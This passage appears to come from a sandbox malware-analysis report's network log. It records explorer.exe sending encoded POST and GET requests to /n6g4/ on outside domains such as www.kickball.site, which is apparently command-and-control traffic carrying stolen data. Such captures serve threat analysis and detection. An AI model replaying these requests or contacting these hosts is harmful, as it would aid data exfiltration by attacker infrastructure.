                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://www.jamesreadtanusa.com/n6g4/
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Data Raw: 33 66 65 3d 63 39 68 48 6f 53 58 72 56 73 48 69 39 4a 75 32 4d 32 55 77 35 5f 49 63 42 61 38 6d 54 53 32 6a 70 79 6b 54 68 4a 52 79 46 66 43 32 71 4f 7a 67 6a 73 69 6b 52 30 78 44 74 46 64 39 4c 67 61 67 73 56 4b 62 73 46 37 57 50 2d 43 65 35 70 63 6c 57 36 37 62 71 47 67 6d 42 4d 7a 54 48 76 45 4b 62 6e 6e 6a 76 44 62 6f 57 74 76 6d 47 76 70 59 66 67 49 43 32 43 39 2d 77 78 44 58 4d 71 6c 72 39 77 66 37 44 72 4d 4f 59 75 69 36 62 44 74 54 30 73 59 6e 37 4a 71 6b 53 72 6d 42 47 69 65 74 63 44 53 4f 6f 4f 31 33 52 77 76 64 72 43 56 4d 30 64 55 5f 35 56 32 70 77 46 71 64 69 57 39 66 49 45 73 42 39 30 76 4b 53 55 31 35 4b 54 72 7a 4c 47 66 33 77 65 45 56 37 4a 54 6e 44 78 6e 4c 73 45 4c 4a 61 70 33 49 41 64 46 4f 5a 5a 41 78 44 63 6b 79 77 56 69 43 56 58 6c 41 49 59 39 4c 52 66 62 47 43 43 45 5f 61 71 4c 62 71 5f 38 74 65 30 6e 57 49 45 68 37 28 44 6e 2d 62 77 28 61 30 6f 5a 4b 7e 73 41 6a 42 53 45 61 38 4f 33 47 7a 35 6d 69 4a 65 47 63 59 37 45 46 61 67 28 68 7e 37 31 30 37 79 65 4c 34 4d 79 33 62 39 68 74 54 68 57 54 54 4b 79 75 33 6d 62 78 70 5f 6c 4c 78 6a 4e 4c 76 55 4f 4f 37 69 34 46 74 77 68 43 44 69 4b 37 50 69 6a 78 38 72 73 46 49 6f 68 5a 36 66 48 4e 4d 4a 5a 2d 66 62 37 38 4c 6e 68 68 54 30 37 5f 41 66 41 56 32 64 35 31 77 56 55 44 35 6e 63 4a 66 35 66 61 35 65 46 4a 59 4e 4c 4b 74 6c 64 4d 28 72 53 6c 4d 39 75 41 48 55 50 48 70 59 30 4a 32 73 55 76 39 72 42 50 77 39 46 37 32 58 39 7a 55 37 38 59 76 38 4a 44 34 61 6b 45 42 67 6b 54 5a 32 64 55 4b 49 37 49 77 34 61 79 50 79 50 50 68 4e 65 69 52 4b 51 33 61 6f 4e 47 69 37 33 33 58 45 56 30 54 5a 33 4f 54 39 57 37 7a 4a 6e 31 67 77 49 4e 39 4b 41 4a 4a 72 79 46 7e 7a 47 74 4b 6b 76 61 76 54 56 35 75 42 4a 64 43 69 67 4d 77 4d 33 44 7e 57 6c 73 58 52 53 6d 70 6f 44 31 56 34 58 57 4e 71 43 46 34 50 43 59 36 4f 7a 79 42 58 7e 66 49 4d 42 71 7a 71 31 32 52 38 72 43 6d 6a 78 4a 6d 42 46 6d 6e 4c 48 4c 49 79 59 57 48 79 4f 57 59 75 32 31 45 4f 6e 67 33 36 49 4e 72 38 75 49 73 4b 61 52 78 48 51 4b 37 4b 55 73 46 34 54 58 33 4f 38 4d 5a 30 6d 63 75 39 53 67 37 37 37 56 4e 30 36 30 35 54 45 6d 36 54 51 42 64 4f 5a 53 31 63 41 6e 6c 48 38 41 32 4a 44 38 4e 4c 58 4f 75 36 5a 42 52 4b 75 4c 68 35 69 66 43 49 4a 71 68 34 4b 76 66 71 37 4d 42 7a 69 64 4f 48 76 4e 62 65 50 33 35 53 45 55 56 64 46 46 52 5f 77 77 51 71 4d 61 54 72 30 32 52 30 69 45 53 2d 52 64 61 41 48 32 76 72 65 31 44 43 34 71 44 66 6d 67 79 6e 65 5f 58 57 39 51 35 75 56 4b 51 77 41 33 53 35 47 50 44 50 5a 34 4c 72 79 77 61 49 44 2d 74 43 42 68 71 75 72 36 6f 78 50 76 4a 68 48 37 34 74 4d 32 39 65 77 68 73 47 38 4f 48 36 28 7a 48 65 53 4a 7e 58 37 5f 69 50 6a 4c 57 4e 50 67 57 5f 78 67 42 6a 76 30 38 68 47 5f 35 61 45 71 68 59 46 56 44 6b 61 46 44 31 76 65 46 32 44 75 37 6f 51 6e 66 2d 6e 2d 41 68 43 52 48 79 56 77 59 6e 6c 57 4d 77 63 4e 62 67 53 4c 4f 61 35 30 52 74 70 72 34 67 49 46 7a 6d 61 6c 45 4e 59 57 32 7a 79 2d 66 38 48 53 47 4d 34 44 56 68 4d 43 5a 74 58 34 53 59 78 69 68 63 45 4a 74 5a 28 47 74 6d 74 51 75 36 61 50 6e 70 45 47 4d 78 41 71 46 31 73 55 56 53 6d 53 7e 6f 4a 70 39 74 33 69 64 32 34 55 6a 30 42 55 6d 4a 78 66 51 75 5a 5f 58 48 38 37 33 35 43 6e 75 51 4c 4b 30 44 76 62 63 32 70 71 46 54 6b 75 62 39 75 4b 54 4b 65 76 49 75 4b 70 69 79 4b 76 33 6e 38 46 65 6e 70 38 73 6e 67 68 70 53 33 6b 79 52 31 4b 5a 71 6a 31 43 39 68 71 37 61 34 71 65 59 77 42 55 6e 77 69 36 43 37 4c 50 47 59 78 68 61 79 74 35 6d 30 6c 36 5a 79 37 6f 6f 61 65 41 36 78 56 7a 47 48 47 4d 53 6d 55 70 75 5a 45 76 78 56 44 62 4c 68 6e 6c 56 37 6c 67 73 62 71 72 7a 49 57 7e 4d 62 54 50 47 36 56 52 49 28 49 5a 68 43 67 59 6e 35 6d 56 36 6f 48 38 49 78 47 66 41 43 49 6b 4f 77 43 53 74 30 6e 4c 69 78 46 68 59 28 7a 67 6d 66 6e 69 75 78 43 57 48 36 6d 43 65 51 4d 72 4c 6d 53 58 6b 33 45 71 4e 75 64 47 55 33 6c 48 67 59 4a 50 6a 70 69 38 6d 79 53 6c 64 4e 74 68 4e 46 6f 45 77 62 4a 79 63 64 6b 39 53 6b 76 6c 6c 46 31 38 59 41 4a 4a 49 58 6f 35 2d 43 44 31 6a 7e 64 4f 30 61 30 33 61 42 49 54 4f 35 32 48 5f 28 4d 44 30 71 73 4c 42 51 42 70 69 4d 33 4f 49 47 5a 49 34 4f 31 62 4b 38 51 4c 45 57 47 6e 6c 4b 6b 37 38 61 70 50 55 53
                                                                                                      Data Ascii: 3fe=c9hHoSXrVsHi9Ju2M2Uw5_IcBa8mTS2jpykThJRyFfC2qOzgjsikR0xDtFd9LgagsVKbsF7WP-Ce5pclW67bqGgmBMzTHvEKbnnjvDboWtvmGvpYfgIC2C9-wxDXMqlr9wf7DrMOYui6bDtT0sYn7JqkSrmBGietcDSOoO13RwvdrCVM0dU_5V2pwFqdiW9fIEsB90vKSU15KTrzLGf3weEV7JTnDxnLsELJap3IAdFOZZAxDckywViCVXlAIY9LRfbGCCE_aqLbq_8te0nWIEh7(Dn-bw(a0oZK~sAjBSEa8O3Gz5miJeGcY7EFag(h~7107yeL4My3b9htThWTTKyu3mbxp_lLxjNLvUOO7i4FtwhCDiK7Pijx8rsFIohZ6fHNMJZ-fb78LnhhT07_AfAV2d51wVUD5ncJf5fa5eFJYNLKtldM(rSlM9uAHUPHpY0J2sUv9rBPw9F72X9zU78Yv8JD4akEBgkTZ2dUKI7Iw4ayPyPPhNeiRKQ3aoNGi733XEV0TZ3OT9W7zJn1gwIN9KAJJryF~zGtKkvavTV5uBJdCigMwM3D~WlsXRSmpoD1V4XWNqCF4PCY6OzyBX~fIMBqzq12R8rCmjxJmBFmnLHLIyYWHyOWYu21EOng36INr8uIsKaRxHQK7KUsF4TX3O8MZ0mcu9Sg777VN0605TEm6TQBdOZS1cAnlH8A2JD8NLXOu6ZBRKuLh5ifCIJqh4Kvfq7MBzidOHvNbeP35SEUVdFFR_wwQqMaTr02R0iES-RdaAH2vre1DC4qDfmgyne_XW9Q5uVKQwA3S5GPDPZ4LrywaID-tCBhqur6oxPvJhH74tM29ewhsG8OH6(zHeSJ~X7_iPjLWNPgW_xgBjv08hG_5aEqhYFVDkaFD1veF2Du7oQnf-n-AhCRHyVwYnlWMwcNbgSLOa50Rtpr4gIFzmalENYW2zy-f8HSGM4DVhMCZtX4SYxihcEJtZ(GtmtQu6aPnpEGMxAqF1sUVSmS~oJp9t3id24Uj0BUmJxfQuZ_XH8735CnuQLK0Dvbc2pqFTkub9uKTKevIuKpiyKv3n8Fenp8snghpS3kyR1KZqj1C9hq7a4qeYwBUnwi6C7LPGYxhayt5m0l6Zy7ooaeA6xVzGHGMSmUpuZEvxVDbLhnlV7lgsbqrzIW~MbTPG6VRI(IZhCgYn5mV6oH8IxGfACIkOwCSt0nLixFhY(zgmfniuxCWH6mCeQMrLmSXk3EqNudGU3lHgYJPjpi8mySldNthNFoEwbJycdk9SkvllF18YAJJIXo5-CD1j~dO0a03aBITO52H_(MD0qsLBQBpiM3OIGZI4O1bK8QLEWGnlKk78apPUSbfHkcn4HMqfHveasW88Mu8mswC9kwCXR48ETsWOxiT56fTtNN2IVOhKKkRYUrap3-CMxuw9OUJhfDa9jg3Mp0fv1NbgDTrcysB8(go5bjxNWwztj8QNruKIlKFu6PHRsapuW2YLYeOb2otsRjtUMTJ2OOCJW2PsEJqxnUFMXNfXIbygm65UCrx8d9Nc5af11amfX32OXnRqOZhjgF6zjLJl~B2_CyXVhumkTuSRd1wI1Q36NDuCEHrK43fAIGyF7Q0xQzR6(9FytKk2FYia9fE8ppZIvqxw(7d0zWhWapyqvZgB5EzSVCkmqUrw9rM-uli_dqTWgx7rCZhSE9OZX78J7LASn97C6RCI00jyCDV9QzoTd9diBgrdltBVaBwdK5SiAgt55GVPWUaESEy0M4upMV0qaejchjp-(8fiA7wYfkJS8KVm6w4wmusFN1jjRADlhY5kE14boPOjFWQzlS0vmdVIc1oK3hlybr2sqjEYzMqvdksS175OKSwn(-jSpolsRgoXgU8tT4a19-qKOElw69KKKQxLO0oKoqbOkQeDHREUxRYfvjNkT-nX(YDgq9X1nDs-Srb6KK9Xn1eM5q1rieDijKmIHxJbyuVd15RLHB8_grS4vJL8EB0-LDC_uKUJc5PISBQULxdXIEmLCgYGrGF04-pqtC5QaPrCa3y2Fveg0qQY~NnTfynDUyRcZsyPCIw82U3uo4GMWbtDRY6pzo~jRqw2pC9jR_pELoaBztQNgNKnvTSn6D8PCeU1ZmwWyK0gvqEhrjAe1cBTwnHhrFosRgrGiiTqIK4uDYZvuxw0LTPJGM9hkcywNKTzdntneZ9Hm94uiKYZN3Es~9YcQINvx3FHrKgJpmdUb-qTtfXqLrX3FBXO3imMJj2amuAws3ofcorh9Vwak_t2yiE4WC9DbenLLvAyNK(M63fN9xt5mlzBl1HvwmECRZa8wcZwyJekGT(3cufIJFyhAgKDY1n324IgNKZnM_liNEtLubDM7A9DX4y7ydaBsMpVc0iL3G0FHXtG3i1p9U9MXZl2iF5dInJXLTk-dLM_yDl0yWhaKWE8NW7wL2aMnWniULRTV2xTEs~nU8S4rk2SScnHlvlxRaxY9IXxTbOIvAPzkfwgkUftfXawfux-C5UmkTZbG1cH(U5M4dbR(RYpdIH4t1v8MBxWA9NVWYuiAkgvxE9GcAwTfORrE_(esqqmqzmzUQ74Eoj4MncxzDnuitKWFZPqZW2sxrbhPEalfaLvNCtZxWmUYzNDS2AanmS0mxpuZ0S0xDbIShyXEaQLFMqE70jIvFtlQc(Sj2hW7U6EV0rb959VGIzLDxJSa1CH8UEP~W0cz36347zTAaT0TONm6QivHJF8Fu6t2QEpBniWg_Es4xhxXsBVvf5xU6O57SvYDsR5xVVBPoS6WNJd(ozaFVqjRxy4~eGlXkNwy7M_i2AWJnsz2bUTmIOZHA6ZKlCLJW3vZJPM2rcy4JMuv23dt66Iu79G0l4qkzFW4yCLBw0aAe31GfB5kv1QAZQWeNm9FBTVVny9vB4m3AORLwaxL4Vw1gEXlQFj(Ki4xc~sSv9dzlUFN9t1GQT0079yl5R3L7zR(mTjqO2Hi0HuBdf5uedSy5ayWozivZ0jwGEN4v3-U-hpuF6ZZ9bjv_cz(DuiPbGZrFhEf_0HBefHVEXVe1m1b8XoZPbi(q13mhwOBp4_FDJXetFwD7Xm~K72wSpf75LBJkRFzdbhTqsH0XFBsEFfl_fx6-aCL6OKfaJj(h6aTh4pQK3BSxx4zZjwp9Cb2bjWXltcVYG5LAzDBZK3QEE_BW3tumYPtM9LFsa2d6uXfnpapKlrwVdGNMqM9ZS_F6e6EgdKYzWKwPgq0Eb810czN8XzLLCOK0Payt1NhA5LnMeTiUEqbm7-nKUlQ63rl-QAU_7IOkaYW944dI3X1BMZBfUzUFgyqZNTCcDbg6BnWaOAr38OFFPDLSut7hhYRT8HVh4OYeJmg88yHO9k~0fMsNn7IK9uXql7FKG2pEs0fvrd0ObjJqhDHipZoXK9vOfqlAoopZmj3C7pmBI0CnJLRKP0FbSqTfzz9Q6V7ZYBli04EvpE~3FRYj8rslbXG-WFtToXq6gHJNTFno0qx-enSa17iS3-tmHaEIA4M8muRmSnyIkhc0iLEhWt0MCNxdYPlk6WFKheMsa7RwXxEkfpMaePcWHBSQVk~OD5skEfiCmdw_0tMx25vhIFcnYj3hgniAlPZxsWWXkP3MTmwxjNI_isKMxMobcbLqeKxqvgbP31vnB6J8ZNROqJxf44b93zoucftN5pxH3IS2TqMVQrNBoUF1bu91m65y9rCetKbqoF2FSFcGYeubUDv52J3zJ07oZicvySB2LqvjFvPiyNg_fuV_l2YBIL5N9CDpB5p5TqptD1ySOk~gN3F_WnypoPbj0gF9p2(AeLilx4u8GZHYy9dN8Vsg9PTpla~T6wHIrJfoeoXlvKdaZvmP7qoZCWaJ8ZEzrlU4VcQERbOzQn7sylOuo9ljUSwYh7Lvp0AgmCaZ4BYJ2Uwa1kHLRwsIMkIejuuMeVQyPcsxg3OLimMmMpoPt3DEXHR-Rm~adNETgtaqyQI5~QUyiRWeKk004XSwKvCabyhXM1zw8faff6QYOon0nuUWA0whzEF6ecrWP7oS8EvCuHIRqbd_dNjmd-CB4PxcxkWxAXTgfMUxHk~eGlZPxQ


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      3192.168.2.44977635.209.127.15580C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:16.775228024 CEST7624OUTGET /n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi HTTP/1.1
                                                                                                      Host: www.jamesreadtanusa.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      4192.168.2.449778198.54.117.21680C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:22.546966076 CEST9210OUTPOST /n6g4/ HTTP/1.1
                                                                                                      Host: www.kickball.site
                                                                                                      Connection: close
                                                                                                      Content-Length: 409
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.kickball.site
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://www.kickball.site/n6g4/
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Data Raw: 33 66 65 3d 5a 4e 45 5a 34 68 33 30 28 71 39 44 6e 45 76 73 72 5a 49 6e 36 41 6b 32 52 32 42 6e 4c 49 58 75 79 44 6f 78 4b 39 65 5f 67 73 78 61 49 79 58 35 58 51 65 5a 78 6f 48 66 53 49 56 46 4e 38 66 38 65 6c 57 59 74 6c 44 44 69 38 54 41 76 35 32 35 47 65 48 68 62 38 68 63 59 49 4b 72 44 35 6e 4d 32 6a 48 30 50 54 56 42 78 59 32 73 53 55 50 68 52 67 35 44 68 66 42 50 55 61 78 5a 67 31 78 5f 6c 79 37 78 7e 57 34 76 6d 52 59 5f 79 55 45 64 6a 6d 4b 63 45 46 43 6e 77 37 6d 55 71 7a 6b 6a 58 64 4c 6a 53 48 59 36 4c 61 4a 4b 4a 71 74 75 64 4d 32 77 44 64 41 34 37 33 28 54 51 62 34 43 36 4f 59 6c 35 64 46 78 65 76 4f 77 6a 71 69 33 33 32 6e 49 63 48 58 64 58 5f 49 51 6f 49 42 63 72 31 70 5f 73 73 61 47 52 4d 58 55 48 69 66 61 70 65 33 45 35 38 57 4f 6d 59 45 33 44 72 6f 57 4a 30 77 74 67 5f 64 64 54 4d 4d 41 57 69 61 7a 45 37 4d 58 37 53 77 74 48 68 71 6b 38 31 55 4b 4a 44 76 66 4e 33 47 49 46 75 4a 6e 6b 41 44 39 4a 56 76 75 4a 5f 48 45 6f 6b 47 64 69 61 54 45 28 7a 33 32 6f 75 54 54 69 66 66 44 6f 72 67 75 74 59 44 36 56 37 4d 61 4d 4c 54 44 30 53 39 76 69 4a 38 57 45 38 56 33 58 52 4f 5a 41 67 71 31 61 71 4e 44 45 44 76 32 62 72 38 44 47 43 6a 6f 62 33 57 6e 79 6d 4a 42 6f 71 6a 58 46 4e 78 47 76 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: 3fe=ZNEZ4h30(q9DnEvsrZIn6Ak2R2BnLIXuyDoxK9e_gsxaIyX5XQeZxoHfSIVFN8f8elWYtlDDi8TAv525GeHhb8hcYIKrD5nM2jH0PTVBxY2sSUPhRg5DhfBPUaxZg1x_ly7x~W4vmRY_yUEdjmKcEFCnw7mUqzkjXdLjSHY6LaJKJqtudM2wDdA473(TQb4C6OYl5dFxevOwjqi332nIcHXdX_IQoIBcr1p_ssaGRMXUHifape3E58WOmYE3DroWJ0wtg_ddTMMAWiazE7MX7SwtHhqk81UKJDvfN3GIFuJnkAD9JVvuJ_HEokGdiaTE(z32ouTTiffDorgutYD6V7MaMLTD0S9viJ8WE8V3XROZAgq1aqNDEDv2br8DGCjob3WnymJBoqjXFNxGvw).
                                                                                                      May 14, 2022 15:30:22.719718933 CEST9210INHTTP/1.1 405 Not Allowed
                                                                                                      Date: Sat, 14 May 2022 13:30:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Server: namecheap-nginx
                                                                                                      Allow: GET, HEAD
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      5192.168.2.449779198.54.117.21680C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:22.721510887 CEST9224OUTPOST /n6g4/ HTTP/1.1
                                                                                                      Host: www.kickball.site
                                                                                                      Connection: close
                                                                                                      Content-Length: 36477
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.kickball.site
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://www.kickball.site/n6g4/
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Data Raw: 33 66 65 3d 5a 4e 45 5a 34 6a 7a 59 79 37 51 44 72 30 69 43 71 4d 73 7a 77 51 30 30 58 47 4e 69 53 70 4c 31 31 79 34 62 58 73 75 43 75 4f 78 45 5a 32 7a 55 54 58 54 4b 78 71 76 6d 59 71 68 42 48 38 62 5f 65 68 79 6d 74 6c 48 44 6a 39 36 4c 75 65 53 66 46 39 76 69 63 63 68 4b 4b 49 4b 75 48 34 36 71 32 6a 44 47 50 54 64 76 78 74 71 73 53 33 6e 68 54 6e 46 2d 76 66 42 4e 49 4c 42 7a 6b 31 73 41 6c 79 6a 58 7e 54 51 76 6e 68 63 5f 7a 33 4d 65 68 68 7e 62 63 46 43 75 7a 4c 6d 33 68 54 6f 33 58 64 48 4e 53 47 6b 36 4c 50 52 4b 4c 36 4e 75 66 37 69 7a 61 39 41 78 77 58 28 55 55 62 31 4d 36 4f 45 70 35 5a 31 4c 65 64 53 77 6a 61 69 32 68 48 76 41 59 51 36 46 56 38 55 33 6f 49 4e 31 72 67 77 71 73 75 66 54 57 39 6e 5a 4d 6b 71 4e 70 64 62 36 30 38 57 56 74 34 46 72 44 72 6f 63 4a 30 78 4f 67 2d 4e 64 54 50 73 41 57 42 79 7a 4d 37 4d 51 75 53 77 52 4c 42 72 32 34 77 4d 30 4a 44 33 6c 4e 32 7e 59 46 61 31 6e 72 77 7a 39 65 43 37 70 51 76 48 47 73 6b 47 38 6f 36 54 42 28 7a 33 55 6f 71 47 55 6a 6f 48 44 70 36 67 75 39 4c 6e 36 58 4c 4d 61 51 37 54 37 28 79 67 79 69 49 59 53 45 39 6b 49 58 69 69 5a 44 31 7e 31 61 4c 4e 44 49 54 76 32 54 4c 39 45 4c 68 61 46 59 6c 43 76 7e 6d 45 71 68 75 43 7a 4e 64 68 4f 31 45 56 42 78 77 33 4b 36 4b 4f 34 48 54 55 33 79 44 4d 41 42 53 64 76 62 37 58 70 6e 57 7a 59 57 4d 39 38 6c 71 52 48 35 6f 4f 7a 31 42 67 2d 53 70 43 54 79 58 28 62 49 41 6c 41 7a 6d 52 75 43 51 39 74 39 41 4a 2d 73 6a 76 58 4f 4d 7e 7a 4d 34 42 6b 6e 7a 4b 7a 49 69 55 32 6b 72 30 5a 6c 6a 73 70 68 72 49 45 79 44 56 45 59 32 73 46 73 35 6e 58 6f 68 54 45 78 73 50 61 75 42 6e 70 77 5f 35 52 72 33 33 64 70 4e 34 69 42 78 39 32 4d 4f 64 43 63 67 47 42 52 4b 62 70 6c 52 41 32 46 6c 52 71 71 6f 72 51 67 72 53 51 4c 62 4c 46 70 76 69 46 34 52 76 41 76 4d 59 33 4d 4d 73 76 48 53 74 41 39 49 77 4f 6b 43 56 41 34 56 64 66 61 59 31 41 6b 4d 43 49 4d 46 4c 78 51 51 64 6a 57 67 59 58 4a 43 42 73 70 66 79 6d 53 37 47 4a 47 71 36 45 57 6f 6e 59 4e 78 44 32 76 66 41 54 6f 32 56 63 38 48 49 54 37 67 4b 2d 43 56 52 69 41 4a 75 6f 56 7a 33 62 68 37 65 55 72 37 75 76 37 66 59 43 32 47 6d 66 78 6e 5a 2d 4f 5a 77 65 7e 70 47 33 39 71 4a 70 43 5f 49 44 4d 46 4a 41 46 48 33 79 58 74 68 64 7a 7a 6c 41 35 4f 68 76 58 4f 72 74 6d 4e 6d 65 78 56 28 41 55 39 58 38 46 31 34 6e 52 33 4d 57 4a 4a 48 43 67 4c 4f 75 7e 78 4e 50 6d 4e 5a 68 6e 73 54 36 6a 55 74 6f 75 46 67 5f 7a 4a 4f 5f 61 4c 39 38 72 70 66 4a 65 72 66 2d 4e 48 6a 50 4b 75 4a 46 67 75 32 65 53 65 37 6b 33 4e 4b 4b 6a 4c 69 4e 46 35 42 6f 6a 38 54 43 4f 61 33 4f 44 51 64 70 4c 69 38 5a 7e 5f 37 44 63 79 57 36 48 52 35 74 6e 79 56 5f 71 58 35 45 66 71 6f 77 47 6e 65 43 72 56 75 50 48 44 71 62 76 4e 70 63 56 34 6d 5a 78 45 76 43 38 34 75 42 67 52 30 51 76 7a 59 34 4e 35 50 4a 37 2d 4a 32 50 77 31 5f 30 7a 72 65 57 66 33 43 54 38 62 78 69 44 66 74 59 52 45 67 57 61 43 58 31 49 72 61 63 44 6e 71 76 78 6e 30 33 62 69 50 67 69 59 64 49 6b 55 68 68 77 63 53 59 72 6b 52 5a 55 5a 42 65 34 74 4d 44 67 36 51 57 64 71 2d 74 44 54 35 68 4c 31 6f 77 4a 39 35 56 43 6c 48 59 70 30 69 72 59 41 30 55 48 79 59 65 31 34 49 42 71 4b 49 51 35 6f 69 73 4f 6b 70 65 38 77 4b 57 77 57 47 6a 54 55 50 71 75 6e 4e 65 5f 74 4e 4c 43 45 63 42 64 44 57 48 37 57 52 4a 50 32 76 65 38 58 6b 74 72 53 6b 72 6f 4e 45 30 68 39 66 53 73 69 36 75 35 32 58 76 47 52 53 34 57 30 4c 6a 5f 44 61 65 56 49 5a 51 54 61 4b 71 72 6a 36 4b 31 4c 52 33 4e 61 5f 6e 4e 52 42 63 56 69 4f 72 50 30 55 70 6f 45 37 38 44 66 70 28 72 58 42 4d 43 4e 5a 7a 38 74 66 51 2d 6a 64 70 39 46 63 72 46 66 57 58 36 72 34 33 30 61 65 52 32 67 4b 6f 65 45 66 47 4f 6c 59 5a 61 4c 4b 63 38 6d 30 67 4c 59 75 51 70 65 72 65 4d 45 36 37 4d 75 36 72 4f 49 63 7a 30 53 54 4a 4c 54 2d 48 45 72 67 66 4a 66 62 44 45 71 4c 7a 71 31 44 50 46 34 65 34 68 74 30 36 63 75 49 51 67 69 74 4a 44 47 74 33 49 65 71 65 65 55 43 76 41 34 77 44 54 75 63 53 76 66 36 36 4e 34 54 67 48 4c 43 59 79 6a 49 49 71 31 54 74 4f 7a 6c 37 7a 7e 72 6b 30 30 42 6b 30 28 4f 6e 4b 59 4f 41 59 48 72 4c 4a 33 4c 4d 54 30 39 39 48 68 66 52 63 4f 46 6f 64 69 61 6c 6b 35 59 44 36 57 31 42 43 48 78 53 34 66
                                                                                                      Data Ascii: 3fe=ZNEZ4jzYy7QDr0iCqMszwQ00XGNiSpL11y4bXsuCuOxEZ2zUTXTKxqvmYqhBH8b_ehymtlHDj96LueSfF9vicchKKIKuH46q2jDGPTdvxtqsS3nhTnF-vfBNILBzk1sAlyjX~TQvnhc_z3Mehh~bcFCuzLm3hTo3XdHNSGk6LPRKL6Nuf7iza9AxwX(UUb1M6OEp5Z1LedSwjai2hHvAYQ6FV8U3oIN1rgwqsufTW9nZMkqNpdb608WVt4FrDrocJ0xOg-NdTPsAWByzM7MQuSwRLBr24wM0JD3lN2~YFa1nrwz9eC7pQvHGskG8o6TB(z3UoqGUjoHDp6gu9Ln6XLMaQ7T7(ygyiIYSE9kIXiiZD1~1aLNDITv2TL9ELhaFYlCv~mEqhuCzNdhO1EVBxw3K6KO4HTU3yDMABSdvb7XpnWzYWM98lqRH5oOz1Bg-SpCTyX(bIAlAzmRuCQ9t9AJ-sjvXOM~zM4BknzKzIiU2kr0ZljsphrIEyDVEY2sFs5nXohTExsPauBnpw_5Rr33dpN4iBx92MOdCcgGBRKbplRA2FlRqqorQgrSQLbLFpviF4RvAvMY3MMsvHStA9IwOkCVA4VdfaY1AkMCIMFLxQQdjWgYXJCBspfymS7GJGq6EWonYNxD2vfATo2Vc8HIT7gK-CVRiAJuoVz3bh7eUr7uv7fYC2GmfxnZ-OZwe~pG39qJpC_IDMFJAFH3yXthdzzlA5OhvXOrtmNmexV(AU9X8F14nR3MWJJHCgLOu~xNPmNZhnsT6jUtouFg_zJO_aL98rpfJerf-NHjPKuJFgu2eSe7k3NKKjLiNF5Boj8TCOa3ODQdpLi8Z~_7DcyW6HR5tnyV_qX5EfqowGneCrVuPHDqbvNpcV4mZxEvC84uBgR0QvzY4N5PJ7-J2Pw1_0zreWf3CT8bxiDftYREgWaCX1IracDnqvxn03biPgiYdIkUhhwcSYrkRZUZBe4tMDg6QWdq-tDT5hL1owJ95VClHYp0irYA0UHyYe14IBqKIQ5oisOkpe8wKWwWGjTUPqunNe_tNLCEcBdDWH7WRJP2ve8XktrSkroNE0h9fSsi6u52XvGRS4W0Lj_DaeVIZQTaKqrj6K1LR3Na_nNRBcViOrP0UpoE78Dfp(rXBMCNZz8tfQ-jdp9FcrFfWX6r430aeR2gKoeEfGOlYZaLKc8m0gLYuQpereME67Mu6rOIcz0STJLT-HErgfJfbDEqLzq1DPF4e4ht06cuIQgitJDGt3IeqeeUCvA4wDTucSvf66N4TgHLCYyjIIq1TtOzl7z~rk00Bk0(OnKYOAYHrLJ3LMT099HhfRcOFodialk5YD6W1BCHxS4fGI8oh4kKbsR5ezM5_KHUAmltbCX7hOy9D0e6noA53iERvbjEMYqnDjjnYjHn6(XgLw62lLcWplKOqVv02U1c30sGUIy23pznTf94myMAiY7coTlgCAUMb5CdfwFJsKm2affEXQSs-ZKMe1QX-HDDNXStpkiKKfQJ9GVr6db6wy6WuYsLOIG5dpgqn(4W07hPKdpPdR9lXdCn0oYHBh3cxyY(_zUFv75Id16ScbcfnobaqrVgN5MYenQt25YJGKJJNNAz1v-Ay5hIHf25tJaD6qEJKBTJDV5E78_egg9xRm3DMTsboatfc8yyqOL7z~nxLVh1EM3l8EChw6W7ClYcBFyqlnVmGPBNjW_VJO2HLK4hWRUYRQkzBfJIm8DfVI-P3RiDTI4Y_a4aFu5N